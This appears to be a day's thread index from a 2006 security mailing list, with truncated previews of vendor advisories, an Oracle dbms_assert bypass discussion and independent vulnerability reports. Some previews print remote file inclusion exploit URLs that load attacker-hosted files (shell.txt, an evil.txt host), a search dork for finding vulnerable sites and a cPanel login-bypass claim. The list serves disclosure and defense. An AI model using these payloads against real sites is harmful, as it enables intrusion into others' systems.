Cisco Security Advisory: Windows VPN Client Local Privilege Escalation Vulnerability

2006-07-28 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Windows VPN Client Local Privilege Escalation Vulnerability Document ID: 70332 Advisory ID: cisco-sa-20060524-vpnclient http://www.cisco.com/warp/public/707/cisco-sa-20060524-vpnclient.shtml Revision 2.0 Last Updated

Re: Bypassing Oracle dbms_assert

2006-07-28 Thread David Litchfield
Today I released a new whitepaper Bypassing Oracle dbms_assert. SNIP Oracle has no problem with the release of this information (Oracle sees no problem with your publication of the white paper.) The reason Oracle sees no problem with the release of the paper is that for your technique to

[SECURITY] [DSA 1127-1] New ethereal packages fix several vulnerabilities

2006-07-28 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1127-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff July 28th, 2006

[USN-327-1] firefox vulnerabilities

2006-07-28 Thread Martin Pitt
=== Ubuntu Security Notice USN-327-1 July 27, 2006 firefox vulnerabilities CVE-2006-3113, CVE-2006-3677, CVE-2006-3801, CVE-2006-3802, CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809,

[USN-328-1] Apache vulnerability

2006-07-28 Thread Martin Pitt
=== Ubuntu Security Notice USN-328-1 July 27, 2006 apache2 vulnerability CVE-2006-3747 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10

[FLSA-2006:175040] Updated php packages fix security issues

2006-07-28 Thread Marc Deslauriers
- Fedora Legacy Update Advisory Synopsis: Updated php packages fix security issues Advisory ID: FLSA:175040 Issue date:2006-07-27 Product: Red Hat Linux, Fedora Core Keywords:

[OpenPKG-SA-2006.015] OpenPKG Security Advisory (apache)

2006-07-28 Thread OpenPKG
:no Affected Releases: Affected Packages: Corrected Packages: OpenPKG CURRENT = apache-1.3.36-20060720 = apache-1.3.37-20060728 = apache2-2.2.2-20060622 = apache2-2.2.3-20060728 OpenPKG 2-STABLE = apache-1.3.36-2.20060627 = apache-1.3.37-2.20060728

[SECURITY] [DSA 1128-1] New heartbeat packages fix local denial of service

2006-07-28 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1128-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze July 28th, 2006

Portail PHP v1.7 Remote File Include

2006-07-28 Thread Meftun
Portail PHP v1.7 - (chemin) Remote Inclusion Vulnerability #Author: ### #C-W-M# ###www.meftunnet.com### #TURKEI ### #script: Portail PHP #Class : Remote [EMAIL PROTECTED]:

[OpenPKG-SA-2006.016] OpenPKG Security Advisory (ruby)

2006-07-28 Thread OpenPKG
: Corrected Packages: OpenPKG CURRENT = ruby-1.8.4-20051225 = ruby-1.8.4-20060728 OpenPKG 2-STABLE = ruby-1.8.4-2.20060622 = ruby-1.8.4-2.20060728 OpenPKG 2.5-RELEASE = ruby-1.8.3-2.5.0 = ruby-1.8.3-2.5.1 Description: Multiple unspecified vulnerabilities in the Ruby [1

[ MDKSA-2006:132 ] - Updated libwmf packages fixes integer overflow vulnerability

2006-07-28 Thread security
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:132 http://www.mandriva.com/security/

[OpenPKG-SA-2006.017] OpenPKG Security Advisory (freetype)

2006-07-28 Thread OpenPKG
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OpenPKG Security AdvisoryThe OpenPKG Project http://www.openpkg.org/security/ http://www.openpkg.org [EMAIL PROTECTED]

Remote Include Vulnerability ==== in Dr.Jr7 Gallery 3.2 RC1

2006-07-28 Thread R0t-K33Y
TitLe : Remote Include Vulnerability in Dr.Jr7 Gallery 3.2 RC1 eXpLoIt : http://[target]/[path]/Gallery_one/Gallery.php?pic=shell.txt By : R0t-KeY --- s33 u ; )

RE: Bypassing Oracle dbms_assert

2006-07-28 Thread Alexander Kornbrust
David, It seems you missed it. To be honest I don't understand your email. The problem exists and I have 36+ Oracle vulnerabilities (=dozens in 10.2.0.1) where I can bypass dbms_assert. Oracle is aware of this problem and has already assigned bug numbers for my findings (e.g. 7569081 - SQL

Oracle 10g R2 and, probably, all previous versions

2006-07-28 Thread Russell Lowenthal
Interesting comment. So if I understand what you are saying I should be able to create a user: SQL create user nottoosmart identified by d0ntkn0wmuch; User created. SQL grant create session to nottoosmart; Grant succeeded. SQL connect nottoosmart/d0ntkn0wmuch Connected. SQL alter session set

Apache mod_rewrite Buffer Overflow Vulnerability

2006-07-28 Thread Avert
McAfee, Inc. McAfee Avert(tm) Labs Security Advisory Public Release Date: 2006-07-09 Apache 1.3.29/2.X mod_rewrite Buffer Over Vulnerability CVE-2006-3747 __ * Synopsis Mod_rewrite is an Apache module that can be used

[SECURITY] [DSA 1129-1] New osiris packages fix arbitrary code execution

2006-07-28 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1129-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze July 28th, 2006

PHP-Nuke INP XSS

2006-07-28 Thread l2odon
#-- #Aria-Security.net Advisory #Discovered by: l2odon # www.Aria-security.net #Gr33t to: O.U.T.L.A.W A.u.r.a DrtRp Cl0wn #--- #Software: PHP-Nuke INP

Guestbook Mambo Module == v1.3.0 Multiple Remote File Include Vulnerabilities

2006-07-28 Thread matdhule
--- Guestbook Mambo Module == v1.3.0 Multiple Remote File Include Vulnerabilities --- Author : Matdhule Date: July 27th 2006

Re: Fusion Polls (xtrphome) Remote File Inclusion

2006-07-28 Thread security curmudgeon
: ## : # Fusion Polls (xtrphome) Remote File Inclusion : ## Is this Fusion Polls: Fusion Poll 1.1 http://www.fusionphp.net/ http://www.ezgoal.com/channels/developer/f.asp?f=319691 Fusion

Lan-Aces Office Logic

2006-07-28 Thread Mike
Does anyone use this email client? I have to say It would be in your best intrest to turn off html messages until I speak with tech support at Lan-Aces. If they do not respond within 24 hours I will post a huge security bypass exploit that works for all html scripting blocking mechanisim. With

cpanel login problem

2006-07-28 Thread ali
u can login to your account without username ! example : your user name : hackerz your password : 123456 u can login with only - pass : 123456 ++

Hustle -- Tumbleweed Email Firewall Remote Vulnerability

2006-07-28 Thread Ryan Smith
As of 24.7.2006, a new advisory detailing a buffer overflow in Tumbleweed EMF's LHA archive processing has been made public on the Hustle Labs website. Please visit http://www.hustlelabs.com/advisories.html for more information. -Ryan Smith

PrinceClan Chess Mambo Com = 0.8 Remote Inclusion Vulnerability

2006-07-28 Thread tr_zindan
By:Tr_ZiNDaN email: [EMAIL PROTECTED] Url: http://www.hack-ezine.org Greetz:EL_MuHaMMeD,CyberWolf,By_MaCRo And ALL WolFSecurityTeam USer dor:inurl:com_pcchess Exploit: http://[host.com]/[path]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://evil.txt?